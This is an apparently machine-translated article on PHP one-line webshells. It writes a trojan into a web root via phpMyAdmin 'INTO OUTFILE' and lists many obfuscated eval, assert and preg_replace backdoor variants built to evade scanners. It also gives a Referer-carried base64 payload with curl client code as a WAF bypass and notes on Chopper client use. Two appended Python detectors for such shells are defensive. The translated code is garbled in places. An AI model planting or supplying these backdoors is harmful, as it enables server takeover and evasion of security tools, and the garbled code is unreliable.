Writing a one-line PHP trojan through phpMyAdmin: a test

Source: Internet
Author: User
Tags assert base64 eval http request php code phpinfo phpmyadmin

Method one: a one-line trojan

I happened to get hold of a config file, found that the account was root, and that phpMyAdmin was available. All right, let's try it.

Select ' <?php @eval ($_post[-77]);? > ' into outfile ' E:\Web\wp-content\errors.php '

The query reported success, but the constructed URL returned a 404, so the write had apparently not worked; it was probably an escaping problem.
Then I tried:

Select ' <?php @eval ($_post[-77]);? > ' into outfile ' e:\\web\\xxx.xx.vn\\wp-content\\errors.php '

I ran it again; it reported success, and visiting the URL showed that it had really worked.

Another kind of one-line trojan


I found many trojans on the server, left there for anyone to use at will ... NND

<?php @eval ($_post[' C ']);? >

Using it is simple: point a local submission form at the file, and the PHP code submitted in the request is executed.


Hiding a small PHP backdoor in a 404 page:

<! DOCTYPE HTML public '-//ietf//dtd HTML 2.0//en ' >


A 404 page is a file that almost every website has, and few people ever check or modify it, so it can be used to hide a backdoor.

A one-line PHP backdoor with no signature:

<?php
session_start ();
$_post[' code '] && $_session[' thecode ' = Trim ($_post[' code '));
$_session[' Thecode ']&&preg_replace (' a\ ' eis ', ' e '. ') V '. ' A '. ' L '. ' (Base64_decode ($_session[\ ' thecode\ ')) ', ' a ');
This assigns the contents of $_POST['code'] to $_SESSION['thecode'] and then executes $_SESSION['thecode']. The notable point is that there is no signature: a scanning tool that checks the code raises no alarm, which is the goal.

A highly covert PHP backdoor:
<?php $_get[a] ($_get[b);? >


This trojan consists of nothing but a call built from GET parameters.

How to use:

? a=assert&b=${fputs%28fopen%28base64_decode%28yy5waha%29,w%29,base64_decode% 28pd9wahagqgv2ywwojf9qt1nuw2ndktsgpz4x%29%29};
After execution, a one-line trojan c.php is generated in the current directory. When the parameter is eval, an error is raised and the trojan is not generated; with assert the same error is raised, but the trojan is generated anyway. This should not be underestimated: a simple one-liner can be extended to uses like this.

Layered requests: a PHP backdoor that runs encoded code
This method is implemented in two files. File 1:

<?php//1.php Header (' Content-type:text/html;charset=utf-8 ');
Parse_str ($_server[' http_referer '],  $a); if (reset ($a)  ==  '  && count ($a)  == 9)  {   eval (
Base64_decode (Str_replace (" ",  "+",  implode (Array_slice ($a,  6))));
File 2 <?php//2.php header (' Content-type:text/html;charset=utf-8 ');
The code to execute $code  = <<<code phpinfo ();
CODE;
$code  = base64_encode ($code) for Base64 coding; Constructs the Referer string $referer  =  "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=
&i= ";
Backdoor URL $url  =  ' http://localhost/test1/1.php ';
$ch  = curl_init (); $options  = array (    CURLOPT_URL =>  $url,     
Curlopt_header => false,     curlopt_returntransfer => true,
    CURLOPT_REFERER =>  $referer); Curl_setopt_array ($ch,  $options); Echo curl_exec ($ch);


The base64-encoded code is carried in the HTTP_REFERER of the HTTP request and executed, which gives the backdoor effect. WAFs generally inspect the Referer less strictly, or not at all, so this idea works well for bypassing a WAF.
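To find the Referer-carried payload described above in web server logs, the following added example (not from the original article) parses combined-format access-log lines, treats a scheme-less Referer as a bare query string, and flags parameter values that base64-decode to PHP-looking code. The log lines, IP addresses, rule names and function names are constructed for illustration; only the Referer layout and the phpinfo() demo payload follow the page.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, urlsplit

LOG_RE = re.compile(r'"(?P<req>[A-Z]+ \S+ [^"]*)" \d{3} \S+ "(?P<ref>[^"]*)"')
CODE_HINT = re.compile(r"<\?php|\b(?:eval|assert|system|phpinfo|fopen|fputs)\s*\(", re.I)

def split_referer(ref):
    """Return (is_url, query); a scheme-less Referer is treated as a bare query string."""
    try:
        parts = urlsplit(ref)
        return bool(parts.scheme), (parts.query if parts.scheme else ref)
    except ValueError:
        return False, ref

def decoded_values(query):
    """Yield text recovered from base64-looking parameter values."""
    for _, value in parse_qsl(query, keep_blank_values=True):
        value = value.replace(" ", "+")  # "+" becomes a space during URL decoding
        if re.fullmatch(r"[A-Za-z0-9+/]{12,}=*", value):
            try:
                raw = base64.b64decode(value + "=" * (-len(value) % 4), validate=True)
                yield raw.decode("utf-8")
            except (binascii.Error, UnicodeDecodeError):
                continue

def suspicious_referers(lines):
    """Return (request, reasons) for log lines whose Referer looks like a code carrier."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m or m.group("ref") in ("", "-"):
            continue
        is_url, query = split_referer(m.group("ref"))
        reasons = [] if is_url else ["referer-not-a-url"]
        if any(CODE_HINT.search(text) for text in decoded_values(query)):
            reasons.append("base64-code-in-referer")
        if reasons:
            hits.append((m.group("req"), reasons))
    return hits

# Constructed access-log lines; the payload is the page's phpinfo() demo value.
BAD_REF = "a=10&b=ab&c=34&d=re&e=32&f=km&g=%s&h=&i=" % base64.b64encode(b"phpinfo();").decode()
LINE = '%s - - [01/Jan/2024:00:00:01 +0000] "GET %s HTTP/1.1" 200 512 "%s" "curl/8.0"'
SAMPLE_LOG = [LINE % ("203.0.113.5", "/test1/1.php", BAD_REF),
              LINE % ("198.51.100.7", "/index.php", "https://example.com/index.php?page=2")]
print(suspicious_referers(SAMPLE_LOG))
```

The same check belongs in WAF or log-pipeline rules for any header the application does not need to parse, since the page's point is that the Referer is inspected less strictly than the body.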

weevely, a PHP backdoor generation tool

Weevely is free webshell software for PHP that simulates a telnet-like shell connection. It is commonly used against web applications, to hide a backdoor or to manage a site through a telnet-like session instead of through web pages. The server-side PHP code that weevely generates is base64-encoded, so it can fool mainstream antivirus software and IDS; once uploaded, the server-side code can usually be driven directly from weevely.

The PHP backdoors that weevely generates use what is now the mainstream approach: base64 encoding combined with string deformation. The functions used in the backdoor are all common string-processing functions, and functions such as eval and system, which serve as detection rules, never appear directly in the code, so the backdoor file can get past backdoor-finding tools. Scanned with a "dark set" web backdoor detection tool, the file is reported as containing no threat.

The above is only a brief introduction with a screenshot; how to use the tool is not covered here, this is just basic background.

Three variants of the one-line PHP trojan

The first:
<?php ($_=@$_get[2]). @$_ ($_post[1)?>
In Chopper (the "kitchen knife" client), enter http://site/1.php?2=assert with password 1.
The second:
. PHP
$_= "";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|""). ($_[+""]|""). ($_[+""]^"");
? >
<?php ${' _ '. $_}[' _ ' (${' _ '. $_}[' __ ']);? >
In Chopper, enter http://site/2.php?_=assert&__=eval ($_post[' Pass '). It is more covert if you use Chopper's additional-data field; other injection tools also work, because the data is submitted by POST.
The third:
($b 4dboy = $_post[' B4dboy ']) && @preg_replace ('/ad/e ', ' @ '. str_rot13 (' Riny '). " ($b 4dboy) ', ' Add ');


str_rot13('riny') is the encoded form of eval, so the keyword is avoided entirely without losing the effect. Enough to make you spit blood!

Finally, a list of several advanced one-line PHP trojan backdoors:

1,

$hh = "P". " R "." E "." G "." _"." R "." E "." P "." L "." A "." C "." E ";

$HH ("/[discuz]/e", $_post[' h '], "Access");

A Chopper one-liner
2,
$filename =$_get[' xbid '];
Include ($filename);
A dangerous include: it directly compiles and runs any file as PHP
3,
$reg = "C". " O "." P "." Y ";
$reg ($_files[myfile][tmp_name],$_files[myfile][name]);
Renames any file
4,
$gzid = "P". " R "." E "." G "." _"." R "." E "." P "." L "." A "." C "." E ";
$gzid ("/[discuz]/e", $_post[' h '], "Access");
A Chopper one-liner
5, include ($UID);
A dangerous include: it directly compiles and runs any file as PHP. POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif
A GIF with a one-liner inserted
6, a typical one-liner
Program Backdoor Code
<?php Eval_r ($_POST[SB])?>
Program code
<?php @eval_r ($_POST[SB])?>
Fault Tolerant Code
Program code
<?php assert ($_POST[SB]);? >
Use the expert mode of the Lanker one-liner client to execute the relevant PHP statements
Program code
<?$_post[' sa '] ($_post[' SB ']);? >
Program code
<?$_post[' sa '] ($_post[' SB '],$_post[' SC ')?>
Program code
<?php
@preg_replace ("/[email]/e", $_post[' h '], "error");
?>
After using this, enter the following in the "Configuration" field when setting up the connection in the Chopper one-liner client
Program code
<o>h= @eval_r ($_post1);</o>
Program code
<script language= "PHP" > @eval_r ($_POST[SB]) </script>
A one-liner that bypasses restrictions
In short, these one-line PHP backdoors are vicious; a moment's carelessness and you will certainly be hit. So what matters most in today's article? The key points are in the summary at the bottom!
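The variants above avoid keyword signatures by splitting function names across string literals, encoding them with str_rot13, or taking the function name from the request. The following added example (not from the original article, and not the logic of any scanner it mentions) is a heuristic Python check that folds concatenated literals back together and flags those shapes instead of bare keywords. The rule names, the `scan` and `fold_concat` functions and the sample strings are constructed for illustration.

```python
import codecs
import re

REQ = r"\$_(?:GET|POST|REQUEST|COOKIE|SESSION|SERVER|FILES)\b"
SINKS = {"eval", "assert", "system", "exec", "passthru", "shell_exec",
         "preg_replace", "create_function", "copy"}
FLAGS = "[imsxADSUXJu]*"  # PCRE modifiers other than the code-evaluating "e"
LITERAL_PAIR = re.compile(r"""(["'])([^"'\\]*)\1\s*\.\s*(["'])([^"'\\]*)\3""")

def fold_concat(src):
    """Join adjacent literals ("P"."R"."E" -> "PRE") until nothing changes."""
    prev = None
    while prev != src:
        prev = src
        src = LITERAL_PAIR.sub(lambda m: '"' + m.group(2) + m.group(4) + '"', src)
    return src

def scan(php):
    """Return the sorted finding names for one PHP source string."""
    src = fold_concat(php)
    found = set()
    # One-step taint only: variables assigned directly from a request superglobal.
    tainted = set(re.findall(r"(\$\w+)\s*=\s*@?" + REQ, src))
    data = "(?:" + "|".join([REQ] + [re.escape(v) + r"\b" for v in tainted]) + ")"
    if re.search(r"\b(?:eval|assert)\s*\([^;]*" + data, src, re.I):
        found.add("request-data-to-eval")
    if re.search(r"\b(?:include|require)(?:_once)?\s*\(?\s*" + data, src, re.I):
        found.add("request-controlled-include")
    if re.search(data + r"\s*(?:\[[^\]]*\])?\s*\(", src):
        found.add("request-value-called-as-function")
    if re.search(r"""\(\s*(["'])([^\w\s\\"'])(?:(?!\2).)*\2""" + FLAGS + "e"
                 + FLAGS + r"\1\s*,", src):
        found.add("regex-eval-modifier")
    for m in re.finditer(r"""(["'])(\w+)\1""", src):
        if m.group(2).lower() in SINKS:
            found.add("function-name-in-string")
    for m in re.finditer(r"""str_rot13\s*\(\s*(["'])(\w+)\1""", src, re.I):
        if codecs.decode(m.group(2), "rot13").lower() in SINKS:
            found.add("rot13-encoded-function-name")
    return sorted(found)

# Constructed samples modelled on the shapes listed on this page.
SAMPLES = {
    "concat": '$hh = "P"."R"."E"."G"."_"."R"."E"."P"."L"."A"."C"."E";\n'
              '$hh("/[discuz]/e", $_POST["h"], "Access");',
    "benign": "<?php echo htmlspecialchars($_GET['q']); include 'header.php'; ?>",
}
print({name: scan(code) for name, code in SAMPLES.items()})
```

Regex heuristics like these produce false positives and miss multi-step data flow, so they are best used to rank files for review alongside file-integrity monitoring of the web root.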
